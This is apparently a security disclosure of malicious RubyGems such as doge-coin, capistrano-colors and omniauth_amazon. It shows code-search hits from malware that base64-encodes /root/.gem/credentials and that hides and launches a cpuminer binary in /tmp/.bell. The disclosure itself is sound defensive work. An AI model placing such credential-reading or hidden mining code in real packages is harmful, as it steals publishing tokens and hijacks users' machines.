I read rest-client/rest-client#713 and search similar problems using gem-codesearch.
And I found some gems contain malware and mining software.
znz@aluminium:~$ csearch 'File.read.*/root/.gem/credentials'
/home/gem-codesearch/gem-codesearch/latest-gem/awesome-bot-1.18.0/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/linux.rb: gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
znz@aluminium:~$ csearch 'cpuminer'
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/linux.rb: FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
I read rest-client/rest-client#713 and search similar problems using gem-codesearch.
And I found some gems contain malware and mining software.